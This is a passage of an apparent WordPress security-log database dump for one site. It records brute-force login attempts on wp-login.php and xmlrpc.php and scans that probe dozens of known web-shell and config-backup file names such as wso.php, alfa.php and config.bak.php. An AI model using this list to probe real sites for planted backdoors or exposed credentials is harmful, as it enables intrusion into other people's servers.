R','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.64.82.118',3225440886,'newd',0,1665093137.1310,7,'mUSeYtPQbJwTy9Bi4WrNjzE6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('146.148.44.185',2459184313,'newd',0,1665095562.2741,7,'XeIE2KOrq7N1kwYxDuTWmapR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.58.183.78',3510286158,'Joyce',0,1665096693.6101,152,'BH6DqRdz3lJXkQp9gstwvmhx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('110.40.244.196',1848177860,'newd',0,1665097931.5988,7,'A1Ik7lYDLOgHQB4cyo53htVq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.120.27',3165026331,'newd',0,1665097974.4750,7,'bdyvYfBerOIT2Z0PCE6aqHct','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.51.74',3328324426,'newd',0,1665099266.9952,7,'tC8dBXAMZyvxKbiw4cWTD3GN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.121.252',3451484668,'newd',0,1665099614.6185,7,'o4tS7VvyxUf3LC9RXMkOgBIp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.250.223.180',3355107252,'newd',0,1665100382.1195,7,'M2Svzb7QPj4Y0AwcGReOW1Vm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('115.79.139.135',1934592903,'newd',0,1665100444.8222,7,'RTkSN7GJoHlwm1FxA0ae6W8u','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1665102234.6237,7,'boCMYGyRT8pLhdNvgzZx5Eri','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.151.60',861640508,'newd',0,1665102871.2060,7,'9gGaqhZm4YXxB0LbpclnzuDE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.144.87.29',2727368477,'newd',0,1665102916.6315,7,'mqab69pgest8w4K1R2HyuiDV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.249.230.17',3355043345,'Joyce',0,1665103071.9904,152,'aAZxzjLtwTJmF0MnlIr6Hk3D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.214.169.69',1540794693,'joyce',0,1665104640.8193,152,'4KgewkX3SOEPhW05bRdzBo8x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.228.208.88',2565132376,'newd',0,1665105377.8115,7,'cEQa52JHULln1B6YjXAfD7by','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('137.184.117.52',2310567220,'newd',0,1665105407.7116,7,'VMuAcD9ZWxnfTptsNQYb2w5q','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.190.142.217',3116273369,'newd',0,1665107869.3200,7,'CYTFW3jRXJcpE0IvQPVMmHk9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.105.29.21',778640661,'newd',0,1665107898.7489,7,'0N3UHlLSZD8Yogd16wABOspk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('37.120.132.83',628655187,'Joyce',0,1665110043.8216,152,'vOgLpThw7bBDFlE6MQzI4fst','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.167.244.67',1806169155,'joyce',0,1665110043.8532,152,'MRqg5KpymkFJ6hPX1CN08LYS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.39.212.31',1294455839,'newd',0,1665110366.7135,7,'K84lyxmiJDIjwVBHkzNvYhFA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.200.228',2671888612,'newd',0,1665110408.8970,7,'3GW87pDErgKm4SdtiFvXQyIe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.156.175.35',3114053411,'Joyce',0,1665110928.6338,152,'F5WVgNRHhT3mD1PA0GxnZKO7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.96.126',2335924350,'newd',0,1665112914.2827,7,'2jW0eKGoaV43s9FIECQ8tqNv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.42.179.51',1076540211,'joyce',0,1665113001.5365,152,'Ijcg7RXVzMJu9mpsrBTWo3Z4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.42.179.67',1076540227,'Joyce',0,1665113578.2003,152,'g2F95VNumpfSThJbvXwMQe3G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('106.52.120.186',1781823674,'newd',0,1665115363.6275,7,'XDxVRU4sLZkC8NBKdibl3Gz1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.116.156',3451483292,'newd',0,1665116519.6392,7,'kcuemyrtdh9AMspfUBXNjPEG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.167.244.83',1806169171,'Joyce',0,1665116630.6798,152,'ZJHDwYVcPQWy2mIgeEzAjvF6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.116.156',3451483292,'newd',0,1665116870.8951,7,'HgWCcIqYLQX2DlZhrGxnbTea','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.241.60.246',2733718774,'admin',0,1665117022.4240,152,'WH79jinUJFm4Zz2adAgkcDpN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.196.152.3',2344916995,'admin',0,1665117332.1403,152,'n57bHxueLPhT4NzksWqrgGAU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.151.60',861640508,'newd',0,1665117858.6748,7,'vNYXGrAsEF5bqTMpQWBOiH1U','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.212.34.69',3168019013,'newd',0,1665117888.6313,7,'NE5MRAVkb6neIY2pzS3uCL0H','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.99.78.164',2808303268,'newd',0,1665117984.8739,152,'26lVjmfXSoJsuKeg13MIF4Oq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.232.183.66',2783491906,'newd',0,1665118302.7018,152,'1pXwg9kb2QTSHGfc3AFRhOml','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.130.212.57',1736627257,'newd',0,1665118924.1098,152,'dm3Ka8GUZ7vFbCYQ6lWMocxS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.197.26',2916402458,'newd',0,1665119236.6773,152,'9buUc6T0lgWwFzmtjQrfkniX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.223',1364735199,'newd',0,1665119536.2978,152,'NkBp28ShXQfmwLgzx1vMiqor','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.14.224.167',755949735,'newd',0,1665120110.6057,152,'NYHdjSFwTUgZik8PEQKbf9Oh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.79.139.135',1934592903,'newd',0,1665120322.3250,7,'pG26w3RBgNOLES9YbzcC8AXt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.212.34.69',3168019013,'newd',0,1665120356.9666,7,'XyLj8RxA1GrFQcONWwnYp3Vo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('216.245.215.122',3639990138,'newd',0,1665120391.0748,152,'cA3g7Ekwd2HBPNGpayl4JD5F','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.240.211.236',2733691884,'newd',0,1665120984.9809,152,'2SjwADEtWpbZFhJOHrmU5yRN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.254.111.139',587100043,'newd',0,1665121258.7163,152,'duDxeFIC1Wj98ZQtbgKNyiV0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.75.221.171',3091979691,'Joyce',0,1665121398.1480,152,'HaL54dKh1SgOZDUNE87eIyPV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.28.36.205',1729897677,'newd',0,1665121811.0263,152,'zOoYfNBwxWKIv0U18aAmXVHi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.211.99.217',3033752537,'newd',0,1665122097.9609,152,'DdtHmSzhYCIrPVxbWo85ZFKp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.70.98.118',2084987510,'newd',0,1665122397.9331,152,'WzK4bIHcSLhNvDuB0pRP3dg2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.164.128',2673452160,'newd',0,1665122726.9860,7,'q8ZaJGFNhWOXruYHsAcyil2j','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('206.189.60.87',3468508247,'newd',0,1665122770.9405,7,'W6GCfey81aImHuwEPJALSX0i','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('110.40.133.172',1848149420,'newd',0,1665122997.3958,152,'ek3stW768AipJorxmz0ISnwK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.76.51.29',1347171101,'',0,1665123641.5966,55,'m89UE3zPdOLwYReNkC5tWf7c','','19|0|0|0|cteisys.com/style.php',0,19,0),('177.222.54.214',2984130262,'newd',0,1665123648.4917,152,'RX21VUG7udWpcZePT0BMto9C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.76.51.29',1347171101,'',0,1665123648.8315,55,'iek35KSOYCdRt2x18ZgnE04Q','','19|0|0|0|cteisys.com/moduless.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123653.8722,55,'gGA0lKuUpjnibOe8fmLB6JoV','','19|0|0|0|cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123659.0381,55,'vQ1GLU8ai0cH4SyKglIjdfAC','','19|0|0|0|cteisys.com/admin.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123788.8867,55,'ZibyBotNHWv2knPeD6qMaTYz','','19|0|0|0|cteisys.com/boom.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123788.8931,10,'ZibyBotNHWv2knPeD6qMaTYz','','707|0|0|0|cteisys.com/boom.php',0,707,0),('80.76.51.29',1347171101,'',0,1665123791.6471,55,'JfTCjk96BAWK5zMXOIb0vUd2','','19|0|0|0|cteisys.com/wp-content/plugins/backup_index.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123795.6219,55,'6c9Pm1GOvflTUeDtsEMo2R5q','','19|0|0|0|cteisys.com/wp-content/db_cache.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123814.8609,100,'nipazWoMjdm65GlsJr7k3gtC','','13|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('80.76.51.29',1347171101,'',0,1665123823.4172,100,'hGt7uEFJ3DpxU1BM6PqZgnHQ','','13|0|0|0|cteisys.com/xmlrp.php',0,13,0),('80.76.51.29',1347171101,'',0,1665123835.5302,100,'lYofXHc8D0IbsjUuqg7F1kC6','','13|0|0|0|cteisys.com/wpindex.php',0,13,0),('80.76.51.29',1347171101,'',0,1665123863.5535,100,'bO7p2WtV3XoYLh9GwETyv6BU','','13|0|0|0|cteisys.com/larva.php',0,13,0),('80.76.51.29',1347171101,'',0,1665123870.0225,100,'bXjLcZUqDG8ftCAEdsp7PugB','','13|0|0|0|cteisys.com/th3_err0r.php',0,13,0),('80.76.51.29',1347171101,'',0,1665123874.4578,55,'Bbr6HmfqMO9lG7ji5Knpt4uZ','','19|0|0|0|cteisys.com/alfindex.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123880.3320,55,'2tNCTBq9bH56Dn8h07uASYda','','19|0|0|0|cteisys.com/alfa.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123885.5815,55,'gCwPanLDtTrYBO2fWixqpUKQ','','19|0|0|0|cteisys.com/wp-booking.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123889.7640,55,'sghPMjaOUo1WH6tbQKFz9BLm','','19|0|0|0|cteisys.com/cindex.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123898.2055,55,'MakHyr92nmcX3NP7wiDRSzde','','19|0|0|0|cteisys.com/wp-content/wp-1ogin_bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123905.7249,55,'CwvhFmQRAOjEaZW7LqbI0nU1','','19|0|0|0|cteisys.com/wp-1ogin_bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123933.4752,55,'lYThdxGRvIPFBz7HD2UJAbqQ','','19|0|0|0|cteisys.com/wp-includes/fonts/css.php',0,19,0),('45.130.83.44',763515692,'newd',0,1665123945.3925,152,'etQ0RHkn3sGTpWcC5SOVbir6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.76.51.29',1347171101,'',0,1665123961.3359,55,'CtxRBl1wJH3j0Q8I6LU9Kfan','','19|0|0|0|cteisys.com/wp-includes/css/css.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123988.2706,55,'tX3uU5ZnBagOrCY0mpMS68Ac','','19|0|0|0|cteisys.com/old-index.php',0,19,0),('80.76.51.29',1347171101,'',0,1665123994.9964,55,'DJdmRnCSHih5tQs3xvEpofkT','','19|0|0|0|cteisys.com/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124002.9845,55,'O4XC0jyKpFhEbABoVTY9HJ6Z','','19|0|0|0|cteisys.com/wp-admin/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124009.4175,55,'2BkyfaROG8NuKVLADYC5Trxb','','19|0|0|0|cteisys.com/wp-content/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124019.7083,55,'fJOETinIS5KBHcLUgxA9h6jo','','19|0|0|0|cteisys.com/wp-includes/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124025.5507,55,'I3dsOEoc2L8JknxuliCgwDfq','','19|0|0|0|cteisys.com/wp-content/themes/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124027.2327,55,'hINCVqtXAjiH956m8faTpQgL','','19|0|0|0|cteisys.com/wp-content/plugins/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124057.9505,18,'kRCMmxEhPVwH5JUsAjOb6BIe','','13|0|0|0|cteisys.com/wp-includes/css/wp-config.php',0,13,0),('80.76.51.29',1347171101,'',0,1665124063.1086,55,'8DBv1VSlzJkFU6wQh7oe5H2d','','19|0|0|0|cteisys.com/wp-content/plugins/ubh/up.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124081.5230,100,'WeY1TNjfSBo9kRzp532ZmKHA','','13|0|0|0|cteisys.com/wp-includes/wpconfig.bak.php',0,13,0),('80.76.51.29',1347171101,'',0,1665124085.9433,100,'qEv4wCbDGYIsxNcrAjaFop29','','13|0|0|0|cteisys.com/wp-content/plugins/wpconfig.bak.php',0,13,0),('80.76.51.29',1347171101,'',0,1665124108.6191,55,'pXhblW8HjUr15Js6qRkf9dIi','','19|0|0|0|cteisys.com/haders.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124124.1807,100,'eUvIYPVT1yn4DqfgS8Fm2M9x','','13|0|0|0|cteisys.com/wp-content/wp-old-index.php',0,13,0),('80.76.51.29',1347171101,'',0,1665124142.3216,55,'N9TP3281CEFhSXaRWwdBYkfm','','19|0|0|0|cteisys.com/legion.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124147.8516,55,'fVvaQGrbstLFeUIzc2g8JZhD','','19|0|0|0|cteisys.com/wp-content/mu-plugins/db-safe-mode.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124152.7293,55,'Jy2MrxnVqmUIeQwzsXS3TZ4R','','19|0|0|0|cteisys.com/wp-includes/lfx.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124175.3329,55,'k7GIKExDRrjU934O1mnBwSWg','','19|0|0|0|cteisys.com/up.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124178.4874,55,'FIWGNajLbxBYQqP2XiHV7UDO','','19|0|0|0|cteisys.com/upload.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124182.8079,55,'yBHWXgvR2Q8rY6wblx0MIAnu','','19|0|0|0|cteisys.com/config.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124189.7520,100,'1vo2t6RWrkmzdKPy07MexHsh','','13|0|0|0|cteisys.com/test.php',0,13,0),('80.76.51.29',1347171101,'',0,1665124194.0619,55,'7eKzZ0bgRQcyF59uSBW3xJCE','','19|0|0|0|cteisys.com/wp-content/langar.php',0,19,0),('80.76.51.29',1347171101,'',0,1665124197.8229,55,'QWfMbyYxc647ho0PtZKSHJwR','','19|0|0|0|cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',0,19,0),('3.110.180.235',57586923,'newd',0,1665124293.9853,152,'UubxtJ0p128NYlwvQqTc7jsr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.210',1364735186,'newd',0,1665124630.3737,152,'nuiYBpKm9ClVtErjIO5WGUxM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.67.151',2813084567,'newd',0,1665124965.6362,152,'Um5DMKH9VY7tXdg8FkcyQSxn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.124.136',2310569096,'newd',0,1665125163.2384,7,'6FIljyxsA7pknCoZNrbKf9Om','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.46.85.155',3324925339,'newd',0,1665125207.9813,7,'0eyVFBIoN18TRl6sPxWLDiYj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.160.37.174',1738548654,'newd',0,1665125278.7329,152,'asSOxGMp0X2iQFmcdC9KBWej','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.83.187',861623227,'newd',0,1665125663.2555,152,'LZMqKYjUixvbpP2neuySkAah','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.63.71.51',2302625587,'joyce',0,1665125867.6105,152,'HtYzxy1q3E8USbuGW4FkPieX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('114.132.250.235',1921317611,'newd',0,1665125972.7215,152,'Am1yf0CSFpzYsLirDK6h75Ug','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.166.178',2813109938,'',0,1665140879.6141,18,'8Km9OdHx4g3PXF2fTQUDA1kS','','13|0|0|0|cteisys.com/radio.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140880.6821,100,'aHlQAhqtxI0s6MiCTfuLjwry','','13|0|0|0|cteisys.com/wp-admin/js/widgets/radio.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140881.9017,18,'SmWKxeVYz1LMs58qwJgdpnui','','13|0|0|0|cteisys.com/wp-admin/js/widgets/radio.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140883.1586,100,'er6CdQtfaso2hqlnbFgy7ukW','','13|0|0|0|cteisys.com/wp-admin/css/colors/radio.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140884.2034,18,'z9cFkY7nOGSJZDil1LX3WgUw','','13|0|0|0|cteisys.com/wp-admin/css/colors/radio.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140885.5214,100,'gY1K7kyV5fz40TCwIBJXolMt','','13|0|0|0|cteisys.com/wp-content/themes/classic/inc/admin.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140886.5736,18,'TB802k4GUzruEevtcF9N6VOH','','13|0|0|0|cteisys.com/wp-content/themes/classic/inc/admin.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140887.6817,100,'NGRySUt3LvIFmDlM26Ad4snx','','13|0|0|0|cteisys.com/wp-includes/rest-api/endpoints/radio.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140888.8598,18,'OLYsTJxD5NvGFrZBinqMRXgI','','13|0|0|0|cteisys.com/wp-includes/rest-api/endpoints/radio.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140890.9489,100,'AtZKIquy3cLRGQYmPTr0BS2C','','13|0|0|0|cteisys.com/wp-admin/wikindex.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140892.0525,18,'0GFqXxj1iVAfMQTb5UrI6NP4','','13|0|0|0|cteisys.com/wp-admin/wikindex.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140893.0443,100,'fOw53yHd2lVrXsucomT8JDKI','','13|0|0|0|cteisys.com/wp-content/plugins/core-engine/admin.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140894.1097,18,'ReJbGyFDnvMmsWo0OaUhwfHP','','13|0|0|0|cteisys.com/wp-content/plugins/core-engine/admin.php',0,13,0),('5.101.156.45',90545197,'admin',0,1665140930.9134,51,'iDJnw7dgHY82A04VcSWBUeGE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.167.244.67',1806169155,'joyce',0,1665141373.3790,152,'wjsWIxQ9Vbhq8O6tnvR4JiUF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.237.121.70',233666886,'admin',0,1665141890.8584,51,'t75GdiOe3XHQsDkyqrLI9aVn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.249.230.7',3355043335,'Joyce',0,1665142674.2983,152,'wMJvOzBNxXSI4tfLAoecdqDC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.197.26',2916402458,'admin',0,1665142879.4803,51,'V6GHCeqJatds1olB7KLIxUAj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('137.184.132.157',2310571165,'admin',0,1665143851.8815,51,'ejHDvBrXmLtAnCF7aUIl4g9w','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.180.230',2319758566,'newd',0,1665197075.6228,7,'7VHdu8gaqeoFwAjrvcT3CyKS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.118.129.10',343310602,'',0,1665249248.7280,55,'HuGdg9v42jMtUINPlXJADOmx','','19|0|0|0|cteisys.com/p.php',0,19,0),('20.118.129.10',343310602,'',0,1665249251.9675,55,'hfZ8AMP7Gb9nUlyoCrKsvJ3T','','19|0|0|0|cteisys.com/priv8.php',0,19,0),('20.118.129.10',343310602,'',0,1665249254.3820,55,'hCQ5Es7oP3ga2JSWw4j6OqUf','','19|0|0|0|cteisys.com/public/403.php',0,19,0),('20.118.129.10',343310602,'',0,1665249257.5784,55,'ZmhFQDHetSNrJ6y0pkx2bn5E','','19|0|0|0|cteisys.com/q.php',0,19,0),('20.118.129.10',343310602,'',0,1665249261.1657,55,'onxiKI8wTEGNPrOSgvmJyjdc','','19|0|0|0|cteisys.com/r.php',0,19,0),('20.118.129.10',343310602,'',0,1665249264.7145,55,'R9Lp3Kua7zJHZfDGMotCqiSk','','19|0|0|0|cteisys.com/root.php',0,19,0),('20.118.129.10',343310602,'',0,1665249266.8111,55,'CfjMSxkOuQ7bvrFh4wV29z5I','','19|0|0|0|cteisys.com/rss.php',0,19,0),('20.118.129.10',343310602,'',0,1665249269.3196,55,'pDghXWnv08ZAMYKTmCH3kOVu','','19|0|0|0|cteisys.com/s.php',0,19,0),('20.118.129.10',343310602,'',0,1665249274.7003,55,'ANCZVT2rbqlHogKMnjs5aIeL','','19|0|0|0|cteisys.com/sh.php',0,19,0),('20.118.129.10',343310602,'',0,1665249278.8100,55,'XgkFe5lswaSmGO67fLhZbEuB','','19|0|0|0|cteisys.com/shell.php',0,19,0),('20.118.129.10',343310602,'',0,1665249282.4372,55,'I1Nb0oTjq3flAiEXnPrM2tJL','','19|0|0|0|cteisys.com/shx.php',0,19,0),('20.118.129.10',343310602,'',0,1665249285.9921,55,'iah1LoUDvm35qSCW7XRVw2Ae','','19|0|0|0|cteisys.com/small.php',0,19,0),('20.118.129.10',343310602,'',0,1665249290.2124,55,'P1kb3RVjY4tJcqNW6sdoaDKL','','19|0|0|0|cteisys.com/templates/beez5/index.php',0,19,0),('20.118.129.10',343310602,'',0,1665249294.8808,55,'r1O4cpVJChMUwG6nuHLdoi5s','','19|0|0|0|cteisys.com/u.php',0,19,0),('20.118.129.10',343310602,'',0,1665249298.2080,55,'uy1mDWFYn0Ps7tpfZQaqA5iG','','19|0|0|0|cteisys.com/up.php',0,19,0),('20.118.129.10',343310602,'',0,1665249303.9908,55,'9VN1MdobsxOH0qYtPkmTA8z7','','19|0|0|0|cteisys.com/uploader.php',0,19,0),('20.118.129.10',343310602,'',0,1665249307.6293,55,'qYbKoN125eLSCsBiITd7rhXy','','19|0|0|0|cteisys.com/uploads/up.php',0,19,0),('20.118.129.10',343310602,'',0,1665249314.2212,55,'igmv8BJAkOPywt5ZheNbWaIz','','19|0|0|0|cteisys.com/v.php',0,19,0),('20.118.129.10',343310602,'',0,1665249316.6531,55,'yiRM9rbkj7gOL2h5DvqxNTYC','','19|0|0|0|cteisys.com/vuln.php',0,19,0),('20.118.129.10',343310602,'',0,1665249323.5678,55,'KlfHBZMu7Lz3e4npXyCbcY6o','','19|0|0|0|cteisys.com/w.php',0,19,0),('20.118.129.10',343310602,'',0,1665249325.8658,55,'w86XkySNFbAsLj2d4WeIGYvq','','19|0|0|0|cteisys.com/w3llstore.php',0,19,0),('20.118.129.10',343310602,'',0,1665249328.4264,55,'5cp8TRUHay7SBbiqtojAOQIm','','19|0|0|0|cteisys.com/wp-admin.php',0,19,0),('20.118.129.10',343310602,'',0,1665249331.6506,55,'nJ6d15fNP9HCyAwUEsDvYpFx','','19|0|0|0|cteisys.com/wp-admin/css/fw.php',0,19,0),('20.118.129.10',343310602,'',0,1665249335.4795,55,'Stk80poyHOPK9zIBQbEJlCiY','','19|0|0|0|cteisys.com/wp-admin/fw.php',0,19,0),('20.118.129.10',343310602,'',0,1665249340.3961,55,'OCpocrW3D4xTbBRQiI0AZmMU','','19|0|0|0|cteisys.com/wp-admin/maint/about.php',0,19,0),('20.118.129.10',343310602,'',0,1665249346.4451,55,'HTear0vSWZ7yzoXGpnsFMIq8','','19|0|0|0|cteisys.com/wp-admin/radio.php',0,19,0),('20.118.129.10',343310602,'',0,1665249351.0268,55,'X57Tl2aJ0SBW3H4bVxzCyjGE','','19|0|0|0|cteisys.com/wp-blog.php',0,19,0),('20.118.129.10',343310602,'',0,1665249352.7561,55,'G0z6nRaW9BpK5FlsrZ8XHLm7','','19|0|0|0|cteisys.com/wp-class.php',0,19,0),('20.118.129.10',343310602,'',0,1665249358.0702,55,'BLEAQoGNhU8ct2namH5g0zyS','','19|0|0|0|cteisys.com/wp-content/about.php',0,19,0),('20.118.129.10',343310602,'',0,1665249360.7473,55,'PoDQyACHTxGLS2rB4WabYpt8','','19|0|0|0|cteisys.com/wp-content/fw.php',0,19,0),('20.118.129.10',343310602,'',0,1665249367.5607,55,'k6rHDSCl8vTu7FMjYQdJmsbW','','19|0|0|0|cteisys.com/wp-content/wp.php',0,19,0),('20.118.129.10',343310602,'',0,1665249370.1642,55,'E2xfjqV4UbilF5nmeS0t9gTa','','19|0|0|0|cteisys.com/wp-content/x.php',0,19,0),('20.118.129.10',343310602,'',0,1665249375.7598,55,'Alt18npjMBz2JqDXk9CHTrR7','','19|0|0|0|cteisys.com/wp-file.php',0,19,0),('20.118.129.10',343310602,'',0,1665249379.2745,55,'H1VR3aphOxslyvmZ6rIzKquB','','19|0|0|0|cteisys.com/wp-includes/991176.php',0,19,0),('20.118.129.10',343310602,'',0,1665249383.4059,55,'B6oyZ901WtM7xOXzAU3YPnTc','','19|0|0|0|cteisys.com/wp-includes/about.php',0,19,0),('20.118.129.10',343310602,'',0,1665249390.2328,55,'tKRB7lzvVns1Hje0xIf8oCUD','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('20.118.129.10',343310602,'',0,1665249392.0584,55,'rX6jRq2vG97y0Sn1dNo8QCPE','','19|0|0|0|cteisys.com/wp-info.php',0,19,0),('20.118.129.10',343310602,'',0,1665249396.4446,55,'7CsEnoj6uypPm2x0Ovtb9Fdh','','19|0|0|0|cteisys.com/wp-uploads.php',0,19,0),('20.118.129.10',343310602,'',0,1665249398.0295,55,'jtcMLT1i2uZez6aV48KhF3mo','','19|0|0|0|cteisys.com/wp.php',0,19,0),('20.118.129.10',343310602,'',0,1665249400.1006,55,'N5hy0W28SndDjz9YcaurUE43','','19|0|0|0|cteisys.com/wp2.php',0,19,0),('20.118.129.10',343310602,'',0,1665249403.1491,55,'fYsAwci8qlO2Hd7ahr9Gy1Rj','','19|0|0|0|cteisys.com/wp_wrong_datlib.php',0,19,0),('20.118.129.10',343310602,'',0,1665249406.4997,55,'D4I5EFPfVdTyjw0ktRHB3pQu','','19|0|0|0|cteisys.com/ws.php',0,19,0),('20.118.129.10',343310602,'',0,1665249411.2193,55,'21HLR4Set5Zf8gTA0yCB3Xaq','','19|0|0|0|cteisys.com/wso.php',0,19,0),('20.118.129.10',343310602,'',0,1665249422.6157,55,'WvnJkgyPc3xfDNSrjI4dpwYl','','19|0|0|0|cteisys.com/wso1.php',0,19,0),('20.118.129.10',343310602,'',0,1665249425.8646,55,'2vVGIhYNJWQbnHjtgiR8cTaC','','19|0|0|0|cteisys.com/wso2.php',0,19,0),('20.118.129.10',343310602,'',0,1665249430.6376,55,'iXsAQ2cP8eGabnUmZxlEzwVu','','19|0|0|0|cteisys.com/x.php',0,19,0),('20.118.129.10',343310602,'',0,1665249434.7639,55,'n4mPE5GJWdpOSzFRr3Dh92Xk','','19|0|0|0|cteisys.com/xl.php',0,19,0),('20.118.129.10',343310602,'',0,1665249439.9666,55,'sYrozygXwx4D6EdHlbiT7ZIn','','19|0|0|0|cteisys.com/xleet.php',0,19,0),('20.118.129.10',343310602,'',0,1665249444.4098,71,'jdy5spv2LZaft7FmxVUbqXQB','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('20.118.129.10',343310602,'',0,1665249456.7970,55,'NinKjCtWwLZXov1VOkE7JHs6','','19|0|0|0|cteisys.com/xx.php',0,19,0),('20.118.129.10',343310602,'',0,1665249462.9133,55,'9ol83YIipjOb7AQJkCqseZv4','','19|0|